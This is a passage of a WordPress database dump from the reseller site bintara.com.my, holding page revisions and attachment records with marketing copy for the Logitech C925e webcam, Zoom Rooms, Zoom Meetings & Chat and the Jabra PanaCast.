PRIVACY SHADE</h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.</p><p>[maxbutton id=\"3\" ]</p>','Logitech C925E','','inherit','closed','closed','','3007-revision-v1','','','2019-03-05 17:31:37','2019-03-05 09:31:37','',3007,'https://bintara.com.my/blog/2019/03/05/3007-revision-v1/',0,'revision','',0),(3046,1,'2019-03-05 17:31:39','2019-03-05 09:31:39','<h2>LOGITECH C925E</h2><p>Affordable 1080p HD webcam with integrated privacy shade</p><ul><li>Designed for desktop video conferencing</li><li>RightLightâ„¢ 2 ensures clear video with typical office lighting</li><li>Sliding internal shade assures privacy</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>LOGITECH C925E</h2><p>Enhance every opportunity for collaboration with the Logitech C925e Webcam, which delivers affordably priced, HD-quality video in any office environment. The sturdy, adjustable clip makes it easy to mount on both laptops and external monitors, while a sliding shade assures privacy. The C925e works with virtually all video conferencing software applications, so you can quickly set up and run every meeting.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>MORE PRODUCTIVE CALLS</h3><p>When you canâ€™t meet in person, create a similar experience with the Logitech C925e Webcam and maintain team productivity. Full 1080p high-definition video at 30 frames per second delivers true-to-life clarity.</p><h3>GREAT VIDEO IN ANY ENVIRONMENT</h3><p>Show your best side on every video call, wherever you are. The C925e Webcam features a 78-degree field of view, just right for one or two people. With RightLightâ„¢ 2 Technology, the C925e intelligently adjusts to improve visual quality in low-light and backlit situations.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/c925e-webcam-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>VERSATILE MOUNTING OPTIONS</h4><p>Mount the camera wherever it works best â€“ LCD screen, notebook, or tabletop â€“ with the adjustable clip, or mount C925e on your own tripod instead.</p><h4>CONVENIENT PRIVACY SHADE</h4><p>C925e features an internal privacy shade to assure privacy and peace of mind.</p><p>[maxbutton id=\"3\" ]</p>','Logitech C925E','','inherit','closed','closed','','3007-autosave-v1','','','2019-03-05 17:31:39','2019-03-05 09:31:39','',3007,'https://bintara.com.my/blog/2019/03/05/3007-autosave-v1/',0,'revision','',0),(3048,1,'2019-03-11 14:59:40','2019-03-11 06:59:40','','Zoom Conference Room Solutions_page2_image7','','inherit','closed','closed','','zoom-conference-room-solutions_page2_image7','','','2019-03-11 14:59:40','2019-03-11 06:59:40','',1620,'https://bintara.com.my/wp-content/uploads/2019/03/Zoom-Conference-Room-Solutions_page2_image7.jpg',0,'attachment','image/jpeg',0),(3054,1,'2019-03-11 15:31:00','2019-03-11 07:31:00','<h2>Zoom for the Conference Room</h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing</h3>https://youtu.be/YeFIZXCYa5A<h3>Simple, flexible set up</h3><p>Build the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.</p><h3>Modern capabilities</h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.</p><h3>Happy, productive users</h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.</p><h4>HD video and audio</h4><p>Bring high quality video, audio, and web conferencing to your existing rooms.</p><h4>Wireless sharing</h4><p>Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.</p><h4>Interoperability with any video system</h4><p>Communicate with existing SIP or H.323 systems</p><h4>Meet with anyone</h4><p>Include remote participants on desktop, mobile, or other conference room systems.</p><h4>One touch to start meetings</h4><p>Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p><h4>Centralized management</h4><p>Get the overview status and management of deployed conference rooms in a single admin console</p>		\n			<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>		\n		<h3>Digital Signage</h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.</p><ul><li>Leverage room displays when not in use</li><li>Manage displays at scale or individually</li><li>Unlimited amount of displays supported (both in and out of conference rooms)</li></ul><h3>Scheduling Display</h3><p>End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.</p><h3>Make interactive collaboration easy with touch screens</h3><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotationÂ  all at the tip of your fingers.</p>https://youtu.be/gezS90Pg_fk<p>[maxbutton id=\"1\" ]</p>','Zoom','','inherit','closed','closed','','1620-revision-v1','','','2019-03-11 15:31:00','2019-03-11 07:31:00','',1620,'https://bintara.com.my/blog/2019/03/11/1620-revision-v1/',0,'revision','',0),(3052,1,'2019-03-11 15:26:02','2019-03-11 07:26:02','<h2>Zoom for the Conference Room</h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing</h3><h3>Simple, flexible set up</h3><p>Build the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.</p><h3>Modern capabilities</h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.</p><h3>Happy, productive users</h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.</p><h4>HD video and audio</h4><p>Bring high quality video, audio, and web conferencing to your existing rooms.</p><h4>Wireless sharing</h4><p>Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.</p><h4>Interoperability with any video system</h4><p>Communicate with existing SIP or H.323 systems</p><h4>Meet with anyone</h4><p>Include remote participants on desktop, mobile, or other conference room systems.</p><h4>One touch to start meetings</h4><p>Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p><h4>Centralized management</h4><p>Get the overview status and management of deployed conference rooms in a single admin console</p>		\n			<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>		\n		<h3>Digital Signage</h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.</p><ul><li>Leverage room displays when not in use</li><li>Manage displays at scale or individually</li><li>Unlimited amount of displays supported (both in and out of conference rooms)</li></ul><h3>Scheduling Display</h3><p>End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.</p><h3>Make interactive collaboration easy with touch screens</h3><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotationÂ  all at the tip of your fingers.</p>https://youtu.be/gezS90Pg_fk<p>[maxbutton id=\"1\" ]</p><h3>Zoom for theÂ Conference Room</h3><h4>Simple, flexible set up</h4><p>Build the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.</p><h4>Modern capabilities</h4><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.</p><h4>Happy, productive users</h4><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.</p><h3>Capabilities that enhance the way people work</h3><h4>HD video and audio</h4><p>Bring high quality video, audio, and web conferencing to your existing rooms.</p><h4>Wireless sharing</h4><p>Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.</p><h4>Interoperability with any video system</h4><p>Communicate with existing SIP or H.323 systems</p><h4>Meet with anyone</h4><p>Include remote participants on desktop, mobile, or other conference room systems.</p><h4>One touch to start meetings</h4><p>Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p><h4>Centralized management</h4><p>Get the overview status and management of deployed conference rooms in a single admin console.</p><h3>Already have an existing video conference room system?</h3><p>Use Zoomâ€™s Conference Room Connector to extend your standards-based conference systems to the cloud. Zoomâ€™s Conference Room Connector helps organizations leverage existing products through its life-cycle while delivering a consistent and unified communication experience.</p><h3>Zoom Rooms includes the following value-added services at no additional cost.</h3><h4>Digital Signage</h4><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.</p><ul><li>Leverage room displays when not in use</li><li>Manage displays at scale or individually</li><li>Unlimited amount of displays supported (both in and out of conference rooms)</li></ul><h4>Scheduling Display</h4><p>End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.</p><h4>Make interactive collaboration easy with touch screens</h4><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation all at the tip of your fingers.</p><h4>Flawless video conferencing for every space</h4><p>Unleash the power of cloud-based video conferencing anywhere work gets done.</p><p>[maxbutton id=\"1\" ]</p>','Zoom','','inherit','closed','closed','','1620-revision-v1','','','2019-03-11 15:26:02','2019-03-11 07:26:02','',1620,'https://bintara.com.my/blog/2019/03/11/1620-revision-v1/',0,'revision','',0),(3056,1,'2019-03-11 16:47:20','2019-03-11 08:47:20','<h2>Zoom Meetings &amp; Chat</h2><h4>Enterprise video conferencing with real-time messaging and content sharing</h4><h3>Simplified video conferencing and messaging across any device</h3><h3>Unparalleled usability</h3><p>Enable quick adoption with meeting capabilities that make it easy to start, join, and collaborate across any device.</p><h3>Join anywhere, on any device</h3><p>Zoom Meetings syncs with your calendar system and delivers streamlined enterprise-grade video conferencing from desktop and mobile.</p><h3>Video for every need</h3><p>Enable internal and external communications, all-hands meetings, and trainings through one communications platform.</p>https://youtu.be/VnyitUU4DUY<h3>Built for modern teams</h3><p><strong>HD video and audio</strong><br />Bring HD video and audio to your meetings with support for up to 1000 video participants and 49 videos on screen.</p><p><strong>Recording and transcripts</strong><br />Record your meetings locally or to the cloud, with searchable transcripts.</p><p><strong>Built-in collaboration tools</strong><br />Multiple participants can share their screens simultaneously and co-annotate for a more interactive meeting.</p><p><strong>Streamlined calendaring</strong><br />Support scheduling or starting meetings from Outlook, Gmail, or iCal.</p><p><strong>Meet securely</strong><br />End-to-end encryption for all meetings, role-based user security, password protection, waiting rooms, and place attendee on hold.</p><p><strong>Team Chat</strong><br />Chat with groups, searchable history, integrated file sharing, and 10 year archive. Easily escalate into 1:1 or group calls.</p><h3>Modernize your meeting solution</h3><p>Zoom Meetings for desktop and mobile provides the tools to make every meeting a great one.</p><ul><li>Focus on your meeting â€“ click record to leave the note taking to Zoomâ€™s auto-generated, searchable transcripts</li><li>Share and play videos with full audio and video transmit without uploading the content</li><li>Look meeting-ready with Virtual Backgrounds and Touch Up My Appearance</li></ul>		\n										<img width=\"800\" height=\"471\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/zoom.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/zoom.png 847w, https://bintara.com.my/wp-content/uploads/2019/03/zoom-300x177.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/zoom-768x452.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"222\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/animatedGIF-mobilemeeting_ab06f03-222x300.gif\" alt=\"\" />											\n		<h3>A thoughtful approach to mobile meetings</h3><p>Todayâ€™s mobile professionals need to be able to work and video conference wherever they are. Zoom Meetings for mobile provides the same great experience that youâ€™d expect from the desktop client and more.</p><ul><li>Turn on Virtual Backgrounds and select the image of your choice (iPhone 8+ required)</li><li>Share your screen and co-annotate</li><li>Use Safe Driving Mode or Apple Carplay (iPhone only)</li></ul><h3>Zoom Chat</h3><p>Integrated persistent messaging streamlines workspace collaboration across the desktop and mobile clients.</p><ul><li>Create private or public groups</li><li>Share files and search content</li><li>Seamlessly start a meeting</li></ul>		\n										<img width=\"800\" height=\"552\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256.jpg 828w, https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256-300x207.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256-768x530.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"562\" height=\"421\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae.png 562w, https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae-300x225.png 300w\" sizes=\"(max-width: 562px) 100vw, 562px\" />											\n		<h3>Administration and remote assistance made easy</h3><p>Centralized IT management and remote assistance simplifies deployment and support.</p><ul><li>Track utilization and usage trends</li><li>View version distribution</li><li>Assign granular permission settings (account, group, and user level)</li></ul><p>[maxbutton id=\"1\" ]</p>','Zoom Meetings & Chat','','publish','closed','closed','','zoom-meetings-chat','','','2019-03-11 17:07:26','2019-03-11 09:07:26','',0,'https://bintara.com.my/?page_id=3056',0,'page','',0),(3057,1,'2019-03-11 16:47:20','2019-03-11 08:47:20','','Zoom Meetings & Chat','','inherit','closed','closed','','3056-revision-v1','','','2019-03-11 16:47:20','2019-03-11 08:47:20','',3056,'https://bintara.com.my/blog/2019/03/11/3056-revision-v1/',0,'revision','',0),(3058,1,'2019-03-11 16:55:18','2019-03-11 08:55:18','<h2>Zoom Meetings &amp; Chat</h2><h4>Enterprise video conferencing with real-time messaging and content sharing</h4><h3>Simplified video conferencing and messaging across any device</h3><h3>Unparalleled usability</h3><p>Enable quick adoption with meeting capabilities that make it easy to start, join, and collaborate across any device.</p><h3>Join anywhere, on any device</h3><p>Zoom Meetings syncs with your calendar system and delivers streamlined enterprise-grade video conferencing from desktop and mobile.</p><h3>Video for every need</h3><p>Enable internal and external communications, all-hands meetings, and trainings through one communications platform.</p><h3>Built for modern teams</h3><p><strong>HD video and audio</strong><br />Bring HD video and audio to your meetings with support for up to 1000 video participants and 49 videos on screen.</p><p><strong>Recording and transcripts</strong><br />Record your meetings locally or to the cloud, with searchable transcripts.</p><p><strong>Built-in collaboration tools</strong><br />Multiple participants can share their screens simultaneously and co-annotate for a more interactive meeting.</p><p><strong>Streamlined calendaring</strong><br />Support scheduling or starting meetings from Outlook, Gmail, or iCal.</p><p><strong>Meet securely</strong><br />End-to-end encryption for all meetings, role-based user security, password protection, waiting rooms, and place attendee on hold.</p><p><strong>Team Chat</strong><br />Chat with groups, searchable history, integrated file sharing, and 10 year archive. Easily escalate into 1:1 or group calls.</p>','Zoom Meetings & Chat','','inherit','closed','closed','','3056-revision-v1','','','2019-03-11 16:55:18','2019-03-11 08:55:18','',3056,'https://bintara.com.my/blog/2019/03/11/3056-revision-v1/',0,'revision','',0),(3059,1,'2019-03-11 16:59:32','2019-03-11 08:59:32','','zoom','','inherit','closed','closed','','zoom-2','','','2019-03-11 16:59:32','2019-03-11 08:59:32','',3056,'https://bintara.com.my/wp-content/uploads/2019/03/zoom.png',0,'attachment','image/png',0),(3060,1,'2019-03-11 17:00:52','2019-03-11 09:00:52','','animatedGIF-mobilemeeting_ab06f03','','inherit','closed','closed','','animatedgif-mobilemeeting_ab06f03','','','2019-03-11 17:00:52','2019-03-11 09:00:52','',3056,'https://bintara.com.my/wp-content/uploads/2019/03/animatedGIF-mobilemeeting_ab06f03.gif',0,'attachment','image/gif',0),(3061,1,'2019-03-11 17:03:06','2019-03-11 09:03:06','','img-zoomchat_29cb256','','inherit','closed','closed','','img-zoomchat_29cb256','','','2019-03-11 17:03:06','2019-03-11 09:03:06','',3056,'https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256.jpg',0,'attachment','image/jpeg',0),(3062,1,'2019-03-11 17:05:06','2019-03-11 09:05:06','','img-administration_9287dae','','inherit','closed','closed','','img-administration_9287dae','','','2019-03-11 17:05:06','2019-03-11 09:05:06','',3056,'https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae.png',0,'attachment','image/png',0),(3063,1,'2019-03-11 17:06:20','2019-03-11 09:06:20','<h2>Zoom Meetings &amp; Chat</h2><h4>Enterprise video conferencing with real-time messaging and content sharing</h4><h3>Simplified video conferencing and messaging across any device</h3><h3>Unparalleled usability</h3><p>Enable quick adoption with meeting capabilities that make it easy to start, join, and collaborate across any device.</p><h3>Join anywhere, on any device</h3><p>Zoom Meetings syncs with your calendar system and delivers streamlined enterprise-grade video conferencing from desktop and mobile.</p><h3>Video for every need</h3><p>Enable internal and external communications, all-hands meetings, and trainings through one communications platform.</p><h3>Built for modern teams</h3><p><strong>HD video and audio</strong><br />Bring HD video and audio to your meetings with support for up to 1000 video participants and 49 videos on screen.</p><p><strong>Recording and transcripts</strong><br />Record your meetings locally or to the cloud, with searchable transcripts.</p><p><strong>Built-in collaboration tools</strong><br />Multiple participants can share their screens simultaneously and co-annotate for a more interactive meeting.</p><p><strong>Streamlined calendaring</strong><br />Support scheduling or starting meetings from Outlook, Gmail, or iCal.</p><p><strong>Meet securely</strong><br />End-to-end encryption for all meetings, role-based user security, password protection, waiting rooms, and place attendee on hold.</p><p><strong>Team Chat</strong><br />Chat with groups, searchable history, integrated file sharing, and 10 year archive. Easily escalate into 1:1 or group calls.</p><h3>Modernize your meeting solution</h3><p>Zoom Meetings for desktop and mobile provides the tools to make every meeting a great one.</p><ul><li>Focus on your meeting â€“ click record to leave the note taking to Zoomâ€™s auto-generated, searchable transcripts</li><li>Share and play videos with full audio and video transmit without uploading the content</li><li>Look meeting-ready with Virtual Backgrounds and Touch Up My Appearance</li></ul>		\n										<img width=\"800\" height=\"471\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/zoom.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/zoom.png 847w, https://bintara.com.my/wp-content/uploads/2019/03/zoom-300x177.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/zoom-768x452.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"222\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/animatedGIF-mobilemeeting_ab06f03-222x300.gif\" alt=\"\" />											\n		<h3>A thoughtful approach to mobile meetings</h3><p>Todayâ€™s mobile professionals need to be able to work and video conference wherever they are. Zoom Meetings for mobile provides the same great experience that youâ€™d expect from the desktop client and more.</p><ul><li>Turn on Virtual Backgrounds and select the image of your choice (iPhone 8+ required)</li><li>Share your screen and co-annotate</li><li>Use Safe Driving Mode or Apple Carplay (iPhone only)</li></ul><h3>Zoom Chat</h3><p>Integrated persistent messaging streamlines workspace collaboration across the desktop and mobile clients.</p><ul><li>Create private or public groups</li><li>Share files and search content</li><li>Seamlessly start a meeting</li></ul>		\n										<img width=\"800\" height=\"552\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256.jpg 828w, https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256-300x207.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256-768x530.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"562\" height=\"421\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae.png 562w, https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae-300x225.png 300w\" sizes=\"(max-width: 562px) 100vw, 562px\" />											\n		<h3>Administration and remote assistance made easy</h3><p>Centralized IT management and remote assistance simplifies deployment and support.</p><ul><li>Track utilization and usage trends</li><li>View version distribution</li><li>Assign granular permission settings (account, group, and user level)</li></ul><p>[maxbutton id=\"1\" ]</p>','Zoom Meetings & Chat','','inherit','closed','closed','','3056-revision-v1','','','2019-03-11 17:06:20','2019-03-11 09:06:20','',3056,'https://bintara.com.my/blog/2019/03/11/3056-revision-v1/',0,'revision','',0),(3064,1,'2019-03-11 17:07:26','2019-03-11 09:07:26','<h2>Zoom Meetings &amp; Chat</h2><h4>Enterprise video conferencing with real-time messaging and content sharing</h4><h3>Simplified video conferencing and messaging across any device</h3><h3>Unparalleled usability</h3><p>Enable quick adoption with meeting capabilities that make it easy to start, join, and collaborate across any device.</p><h3>Join anywhere, on any device</h3><p>Zoom Meetings syncs with your calendar system and delivers streamlined enterprise-grade video conferencing from desktop and mobile.</p><h3>Video for every need</h3><p>Enable internal and external communications, all-hands meetings, and trainings through one communications platform.</p>https://youtu.be/VnyitUU4DUY<h3>Built for modern teams</h3><p><strong>HD video and audio</strong><br />Bring HD video and audio to your meetings with support for up to 1000 video participants and 49 videos on screen.</p><p><strong>Recording and transcripts</strong><br />Record your meetings locally or to the cloud, with searchable transcripts.</p><p><strong>Built-in collaboration tools</strong><br />Multiple participants can share their screens simultaneously and co-annotate for a more interactive meeting.</p><p><strong>Streamlined calendaring</strong><br />Support scheduling or starting meetings from Outlook, Gmail, or iCal.</p><p><strong>Meet securely</strong><br />End-to-end encryption for all meetings, role-based user security, password protection, waiting rooms, and place attendee on hold.</p><p><strong>Team Chat</strong><br />Chat with groups, searchable history, integrated file sharing, and 10 year archive. Easily escalate into 1:1 or group calls.</p><h3>Modernize your meeting solution</h3><p>Zoom Meetings for desktop and mobile provides the tools to make every meeting a great one.</p><ul><li>Focus on your meeting â€“ click record to leave the note taking to Zoomâ€™s auto-generated, searchable transcripts</li><li>Share and play videos with full audio and video transmit without uploading the content</li><li>Look meeting-ready with Virtual Backgrounds and Touch Up My Appearance</li></ul>		\n										<img width=\"800\" height=\"471\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/zoom.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/zoom.png 847w, https://bintara.com.my/wp-content/uploads/2019/03/zoom-300x177.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/zoom-768x452.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"222\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/animatedGIF-mobilemeeting_ab06f03-222x300.gif\" alt=\"\" />											\n		<h3>A thoughtful approach to mobile meetings</h3><p>Todayâ€™s mobile professionals need to be able to work and video conference wherever they are. Zoom Meetings for mobile provides the same great experience that youâ€™d expect from the desktop client and more.</p><ul><li>Turn on Virtual Backgrounds and select the image of your choice (iPhone 8+ required)</li><li>Share your screen and co-annotate</li><li>Use Safe Driving Mode or Apple Carplay (iPhone only)</li></ul><h3>Zoom Chat</h3><p>Integrated persistent messaging streamlines workspace collaboration across the desktop and mobile clients.</p><ul><li>Create private or public groups</li><li>Share files and search content</li><li>Seamlessly start a meeting</li></ul>		\n										<img width=\"800\" height=\"552\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256.jpg 828w, https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256-300x207.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/img-zoomchat_29cb256-768x530.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"562\" height=\"421\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae.png 562w, https://bintara.com.my/wp-content/uploads/2019/03/img-administration_9287dae-300x225.png 300w\" sizes=\"(max-width: 562px) 100vw, 562px\" />											\n		<h3>Administration and remote assistance made easy</h3><p>Centralized IT management and remote assistance simplifies deployment and support.</p><ul><li>Track utilization and usage trends</li><li>View version distribution</li><li>Assign granular permission settings (account, group, and user level)</li></ul><p>[maxbutton id=\"1\" ]</p>','Zoom Meetings & Chat','','inherit','closed','closed','','3056-revision-v1','','','2019-03-11 17:07:26','2019-03-11 09:07:26','',3056,'https://bintara.com.my/blog/2019/03/11/3056-revision-v1/',0,'revision','',0),(3067,1,'2019-03-21 10:58:44','2019-03-21 02:58:44','<h2>Zoom for the Conference Room</h2>\r\n<h3>Software-based, flawless video, integrated audio, and wireless content sharing</h3>\r\nhttps://youtu.be/yRQGXlJS-xI\r\n<h3>Simple, flexible set up</h3>\r\nBuild the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.\r\n<h3>Modern capabilities</h3>\r\nDeploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.\r\n<h3>Happy, productive users</h3>\r\nWe focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.\r\n<h4>HD video and audio</h4>\r\nBring high quality video, audio, and web conferencing to your existing rooms.\r\n<h4>Wireless sharing</h4>\r\nCut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.\r\n<h4>Interoperability with any video system</h4>\r\nCommunicate with existing SIP or H.323 systems\r\n<h4>Meet with anyone</h4>\r\nInclude remote participants on desktop, mobile, or other conference room systems.\r\n<h4>One touch to start meetings</h4>\r\nLeveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.\r\n<h4>Centralized management</h4>\r\nGet the overview status and management of deployed conference rooms in a single admin console\r\n<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>\r\n<h3>Digital Signage</h3>\r\nDigital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.\r\n<ul>\r\n 	<li>Leverage room displays when not in use</li>\r\n 	<li>Manage displays at scale or individually</li>\r\n 	<li>Unlimited amount of displays supported (both in and out of conference rooms)</li>\r\n</ul>\r\n<h3>Scheduling Display</h3>\r\nEnd scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.\r\n<h3>Make interactive collaboration easy with touch screens</h3>\r\nPower up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotationÂ  all at the tip of your fingers.\r\n\r\nhttps://youtu.be/gezS90Pg_fk\r\n\r\n[maxbutton id=\"1\" ]','Zoom','','inherit','closed','closed','','1620-revision-v1','','','2019-03-21 10:58:44','2019-03-21 02:58:44','',1620,'https://bintara.com.my/blog/2019/03/21/1620-revision-v1/',0,'revision','',0),(3074,1,'2019-07-27 15:53:02','2019-07-27 07:53:02','<h1>Jabra PanaCast</h1>\n<h4>Engineered to be the worldâ€™s first intelligent 180Â° Panoramic 4K plug-and-play video solution.</h4>\n&nbsp;\n<img src=\"https://www.apac.jabra.com/-/media/Images/Products/Jabra-Panacast/V2/TopBanner/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\" />\n<p style=\"text-align: center;\">[maxbutton id=\"1\" text=\"Contact Sales\" ]</p>\n&nbsp;\n&nbsp;		\n										<img width=\"800\" height=\"541\" src=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-1024x693.jpg 1024w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-300x203.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/07/PanaCast_HuddleRoom-768x520.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h2>Perfect for small meeting rooms</h2><p>The Jabra PanaCast is a plug-and-play device, designed to improve meetings in huddle rooms by using three 13-megapixel cameras and real-time video stitching to give a full 180Â° view. Enjoy a natural, inclusive human perspective, with no blind spots.</p><h1>Inclusive</h1><h2>Unique, real-time video stitching for a natural 180Â° view</h2><p>Enhance your huddle room with Panoramic 4K video. The Jabra PanaCast uses three 13-megapixel cameras and patented real-time video stitching to give a full 180Â° view of the room. Enjoy a natural, human perspective, with no blind spots.</p><h1>Contact sales</h1><h4>Our team of product experts can help you find the best solution for your company. Get instant pricing and advice for your specific environment and use. Fill out the form and a BINTARA representative will contact you.</h4>[maxbutton id=\"1\" text=\"Contact Sales\" ]Â ','Jabra PanaCast','','publish','closed','closed','','jabra-panacast','','','2019-07-27 16:23:29','2019-07-27 08:23:29','',0,'https://bintara.com.my/?page_id=3074',0,'page','',0),(3075,1,'2019-07-27 15:53:02','2019-07-27 07:53:02','','Jabra PanaCast','','inherit','closed','closed','','3074-revision-v1','','','2019-07-27 15:53:02','2019-07-27 07:53:02','',3074,'https://bintara.com.my/blog/2019/07/27/3074-revision-v1/',0,'revision','',0),(3078,1,'2019-07-27 15:58:44','2019-07-27 07:58:44','<h1 class=\"ng-scope\">Jabra PanaCast</h1>\r\n<h4 class=\"ng-binding ng-scope\">Engineered to be the worldâ€™s first intelligent 180Â° Panoramic 4K plug-and-play video solution.</h4>\r\n&nbsp;\r\n\r\n<img src=\"https://www.apac.jabra.com/-/media/Images/Products/Jabra-Panacast/V2/TopBanner/PanaTop.png?la=en-APAC&amp;hash=870A3D4C32FE2ACAE2F72AE17FA9A6BC822DEC69\" />\r\n\r\n[maxbutton id=\"1\" text=\"Contact Sales\" ]','Jabra PanaCast','','inherit','closed','closed','','3074-revision-v1','','','2019-07-27 15:58:44','2019-07-27 